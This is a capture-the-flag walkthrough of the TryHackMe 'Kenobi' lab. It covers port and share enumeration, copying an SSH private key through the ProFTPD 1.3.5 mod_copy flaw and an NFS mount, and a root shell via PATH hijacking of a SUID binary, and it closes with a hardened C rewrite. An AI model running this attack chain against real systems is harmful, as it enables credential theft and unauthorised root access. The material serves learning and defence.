TryHackMe - Kenobi

[Task 1] Deploy the vulnerable machine

  • Set up a bash environment variable

    export IP=KENOBI-IP
    

    NOTE: where KENOBI-IP is shown throughout this writeup, this refers to the TryHackMe server IP.

  • Make sure there is a connection to the THM network

    ping $IP -c 3
    
    PING KENOBI-IP (KENOBI-IP) 56(84) bytes of data.
    64 bytes from KENOBI-IP: icmp_seq=1 ttl=63 time=43.3 ms
    64 bytes from KENOBI-IP: icmp_seq=2 ttl=63 time=43.9 ms
    64 bytes from KENOBI-IP: icmp_seq=3 ttl=63 time=43.1 ms
    
    --- KENOBI-IP ping statistics ---
    3 packets transmitted, 3 received, 0% packet loss, time 2003ms
    rtt min/avg/max/mdev = 43.110/43.424/43.878/0.328 ms
    
  • Scan the machine with nmap

    nmap -sC -sV -vvv -oA $PWD/portScan/nmap-initial $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:38 EDT
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Initiating Ping Scan at 18:38
    Scanning KENOBI-IP [2 ports]
    Completed Ping Scan at 18:38, 0.04s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 18:38
    Completed Parallel DNS resolution of 1 host. at 18:38, 0.01s elapsed
    DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
    Initiating Connect Scan at 18:38
    Scanning KENOBI-IP [1000 ports]
    Discovered open port 21/tcp on KENOBI-IP
    Discovered open port 80/tcp on KENOBI-IP
    Discovered open port 139/tcp on KENOBI-IP
    Discovered open port 111/tcp on KENOBI-IP
    Discovered open port 22/tcp on KENOBI-IP
    Discovered open port 445/tcp on KENOBI-IP
    Discovered open port 2049/tcp on KENOBI-IP
    Completed Connect Scan at 18:38, 0.67s elapsed (1000 total ports)
    Initiating Service scan at 18:38
    Scanning 7 services on KENOBI-IP
    Completed Service scan at 18:38, 11.15s elapsed (7 services on 1 host)
    NSE: Script scanning KENOBI-IP.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 1.99s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.23s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Nmap scan report for KENOBI-IP
    Host is up, received syn-ack (0.044s latency).
    Scanned at 2020-05-09 18:38:16 EDT for 14s
    Not shown: 993 closed ports
    Reason: 993 conn-refused
    PORT     STATE SERVICE     REASON  VERSION
    21/tcp   open  ftp         syn-ack ProFTPD 1.3.5
    22/tcp   open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
    |   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
    |   256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
    80/tcp   open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
    | http-methods:
    |_  Supported Methods: POST OPTIONS GET HEAD
    | http-robots.txt: 1 disallowed entry
    |_/admin.html
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp  open  rpcbind     syn-ack 2-4 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100003  2,3,4       2049/udp6  nfs
    |   100005  1,2,3      34097/tcp   mountd
    |   100005  1,2,3      42895/udp6  mountd
    |   100005  1,2,3      49712/udp   mountd
    |   100005  1,2,3      54641/tcp6  mountd
    |   100021  1,3,4      38881/tcp   nlockmgr
    |   100021  1,3,4      42051/tcp6  nlockmgr
    |   100021  1,3,4      52158/udp   nlockmgr
    |   100021  1,3,4      59194/udp6  nlockmgr
    |   100227  2,3         2049/tcp   nfs_acl
    |   100227  2,3         2049/tcp6  nfs_acl
    |   100227  2,3         2049/udp   nfs_acl
    |_  100227  2,3         2049/udp6  nfs_acl
    139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    2049/tcp open  nfs_acl     syn-ack 2-3 (RPC #100227)
    Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
    |_clock-skew: mean: 9h38m02s, deviation: 2h53m12s, median: 7h58m01s
    | nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | Names:
    |   KENOBI<00>           Flags: <unique><active>
    |   KENOBI<03>           Flags: <unique><active>
    |   KENOBI<20>           Flags: <unique><active>
    |   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
    |   WORKGROUP<00>        Flags: <group><active>
    |   WORKGROUP<1d>        Flags: <unique><active>
    |   WORKGROUP<1e>        Flags: <group><active>
    | Statistics:
    |   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    |   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    |_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
    | p2p-conficker:
    |   Checking for Conficker.C or higher...
    |   Check 1 (port 33364/tcp): CLEAN (Couldn't connect)
    |   Check 2 (port 63681/tcp): CLEAN (Couldn't connect)
    |   Check 3 (port 58242/udp): CLEAN (Failed to receive data)
    |   Check 4 (port 4291/udp): CLEAN (Failed to receive data)
    |_  0/4 checks are positive: Host is CLEAN or ports are blocked
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: kenobi
    |   NetBIOS computer name: KENOBI\x00
    |   Domain name: \x00
    |   FQDN: kenobi
    |_  System time: 2020-05-10T01:36:31-05:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-05-10T06:36:31
    |_  start_date: N/A
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
    

    Answer = 8

[Task 2] Enumerating Samba for shares

  • Use nmap to enumerate a machine for SMB shares

    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:40 EDT
    Nmap scan report for KENOBI-IP
    Host is up (0.042s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares:
    |   account_used: guest
    |   \\KENOBI-IP\IPC$:
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: <unlimited>
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\KENOBI-IP\anonymous:
    |     Type: STYPE_DISKTREE
    |     Comment:
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\home\kenobi\share
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\KENOBI-IP\print$:
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: <none>
    |_    Current user access: <none>
    |_smb-enum-users: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds
    

    How many shares have been found?

    Answer = 3

  • List files within the SMB directory

    smbclient //KENOBI-IP/anonymous
    Enter WORKGROUP\c0g's password:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Sep  4 06:49:09 2019
      ..                                  D        0  Wed Sep  4 06:56:07 2019
      log.txt                             N    12237  Wed Sep  4 06:49:09 2019
    
                    9204224 blocks of size 1024. 6877104 blocks available
    

    Answer = log.txt

  • Recursively download the SMB share.

    smbget -R smb://KENOBI-IP/anonymous
    Password for [c0g] connecting to //anonymous/KENOBI-IP:
    Using workgroup WORKGROUP, user c0g
    smb://KENOBI-IP/anonymous/log.txt
    
    Downloaded 11.95kB in 3 seconds
    cat log.txt | grep port
    # Port 21 is the standard FTP port.
    # Don't use IPv6 support by default.
    #    behaviour of Samba but the option is considered important
    # Windows Internet Name Serving Support Section:
    # WINS Support - Tells the NMBD component of Samba to enable its WINS Server
    #   wins support = no
    # By default, the home directories are exported read-only. Change the
    

    What port is FTP running on? Answer = 21

  • Enumerate NFS exports via rpcbind on port 111

    nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 21:34 EDT
    Nmap scan report for KENOBI-IP
    Host is up (0.042s latency).
    
    PORT    STATE SERVICE
    111/tcp open  rpcbind
    | nfs-showmount:
    |_  /var *
    
    Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
    

    What mount can we see?

    Answer = /var

[Task 3] Gain initial access with ProFTPD

  • Use netcat to connect to the machine on the FTP port.

    netcat KENOBI-IP 21
    220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP ]
    
  • Use searchsploit to find exploits for ProFTPD

    searchsploit ProFTPD 1.3.5
    
    ---------------------------------------------- ---------------------------------
     Exploit Title                                |  Path
    ---------------------------------------------- ---------------------------------
    ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
    ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
    ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
    ---------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results
    

    What is the version? Answer = 1.3.5

  • Copy Kenobi's private key using SITE CPFR and SITE CPTO commands.

    220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP]
    350 File or directory exists, ready for destination name
    250 Copy successful
    

    The /var directory was seen earlier as an NFS export; therefore, if Kenobi's private key is copied to /var/tmp it becomes readable through that export.

  • Mount the /var export (which contains /var/tmp) on the attacking machine

    sudo mkdir /mnt/kenobiNFS
    sudo mount KENOBI-IP:/var /mnt/kenobiNFS/
    ls -la /mnt/kenobiNFS/
    total 56
    drwxr-xr-x  14 root           root     4096 2019-09-04  2019 .
    drwxr-xr-x   3 root           root     4096 2020-05-09 22:06 ..
    drwxr-xr-x   2 root           root     4096 2019-09-04  2019 backups
    drwxr-xr-x   9 root           root     4096 2019-09-04  2019 cache
    drwxrwxrwt   2 root           root     4096 2019-09-04  2019 crash
    drwxr-xr-x  40 root           root     4096 2019-09-04  2019 lib
    drwxrwsr-x   2 root           staff    4096 2016-04-12  2016 local
    lrwxrwxrwx   1 root           root        9 2019-09-04  2019 lock -> /run/lock
    drwxrwxr-x  10 root           crontab  4096 2019-09-04  2019 log
    drwxrwsr-x   2 root           mail     4096 2019-02-26  2019 mail
    drwxr-xr-x   2 root           root     4096 2019-02-26  2019 opt
    lrwxrwxrwx   1 root           root        4 2019-09-04  2019 run -> /run
    drwxr-xr-x   2 root           root     4096 2019-01-29  2019 snap
    drwxr-xr-x   5 root           root     4096 2019-09-04  2019 spool
    drwxrwxrwt   6 root           root     4096 2020-05-10 05:49 tmp
    drwxr-xr-x   3 root           root     4096 2019-09-04  2019 www
    
  • Copy the private key out of /var/tmp and use it to log in to Kenobi's account

    cp /mnt/kenobiNFS/tmp/id_rsa .
    
    sudo chmod 600 id_rsa
    [sudo] password for c0g:
    
    ssh -i id_rsa kenobi@KENOBI-IP
    Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    103 packages can be updated.
    65 updates are security updates.
    
    Last login: Sun May 10 05:18:41 2020 from 10.11.1.193
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.
    
    cat /home/kenobi/user.txt | wc -c
    33
    

[Task 4] Privilege Escalation with Path Variable Manipulation

  • Search the system for SUID type files

    kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
    /sbin/mount.nfs
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/bin/chfn
    /usr/bin/newgidmap
    /usr/bin/pkexec
    /usr/bin/passwd
    /usr/bin/newuidmap
    /usr/bin/gpasswd
    /usr/bin/menu
    /usr/bin/sudo
    /usr/bin/chsh
    /usr/bin/at
    /usr/bin/newgrp
    /bin/umount
    /bin/fusermount
    /bin/mount
    /bin/ping
    /bin/su
    /bin/ping6
    kenobi@kenobi:~$
    

    What file looks particularly out of the ordinary?

    Answer = /usr/bin/menu

  • Run the binary

    kenobi@kenobi:~$ menu
    
    ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     Enter your choice :
    

    How many options appear? Answer = 3

  • Use strings to look for anything human readable within the binary

    kenobi@kenobi:~$ strings /usr/bin/menu
    /lib64/ld-linux-x86-64.so.2
    libc.so.6
    setuid
    __isoc99_scanf
    puts
    __stack_chk_fail
    printf
    system
    __libc_start_main
    __gmon_start__
    GLIBC_2.7
    GLIBC_2.4
    GLIBC_2.2.5
    UH-
    AWAVA
    AUATL
    []A\A]A^A_
     ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     ** Enter your choice :
    curl -I localhost
    uname -r
    ifconfig
    .........
    output shortened
    

    This shows the binary invokes its commands by bare name (curl, uname, ifconfig) rather than by full path (e.g. /usr/bin/curl or /bin/uname), so the PATH variable decides which binary actually runs.

    As this file runs with the root user's privileges (SUID, and it calls setuid), prepending a writable directory to PATH and placing a file named curl there is enough to gain a root shell.

    kenobi@kenobi:~$ cd /tmp
    kenobi@kenobi:/tmp$ echo /bin/sh > curl
    kenobi@kenobi:/tmp$ chmod 777 curl
    kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
    kenobi@kenobi:/tmp$ /usr/bin/menu
    
     ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     ** Enter your choice :1
    # id
    uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
    kenobi@kenobi:/tmp$ cat /root/root.txt | wc -c
    33
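    For contrast, here is a hardened re-implementation of the menu pattern, added as an example (it is not the source of the original /usr/bin/menu, which the page does not include): each command is pinned to an absolute path and run through execve() with a fixed environment, so a writable directory prepended to the caller's PATH can no longer substitute a different curl. The absolute paths are assumed for an Ubuntu 16.04 layout.

```c
/* Hardened "menu" (added example, not the original binary): absolute paths + fixed env. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The three commands strings(1) revealed, with absolute paths assumed for Ubuntu 16.04. */
static const char *const MENU_CMDS[3][4] = {
    {"/usr/bin/curl", "-I", "localhost", NULL},
    {"/bin/uname", "-r", NULL, NULL},
    {"/sbin/ifconfig", NULL, NULL, NULL},
};

/* Map a 1-based menu choice to its argv; NULL for anything out of range. */
const char *const *menu_command(int choice) {
    if (choice < 1 || choice > 3)
        return NULL;
    return MENU_CMDS[choice - 1];
}

/* Run argv via execve() with a minimal environment, so the caller's PATH (the
 * /tmp trick above) is never consulted. Returns the child's exit status or -1. */
int run_fixed(const char *const argv[]) {
    char *const envp[] = {"PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], (char *const *)argv, envp);
        _exit(127); /* exec failed: the pinned path does not exist */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check: the child sees the pinned PATH, not whatever the caller exported. */
int child_path_is_fixed(void) {
    const char *const probe[] = {"/bin/sh", "-c",
        "[ \"$PATH\" = /usr/bin:/bin:/usr/sbin:/sbin ]", NULL};
    return run_fixed(probe) == 0;
}

int main(void) {
    int choice = 0;
    printf("1. status check\n2. kernel version\n3. ifconfig\nEnter your choice: ");
    if (scanf("%d", &choice) != 1 || menu_command(choice) == NULL)
        return 1;
    return run_fixed(menu_command(choice));
}
```

    Dropping the SUID bit and using sudo rules for the three commands would remove the root exposure entirely; the pinned paths only close the PATH hijack shown above.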
    
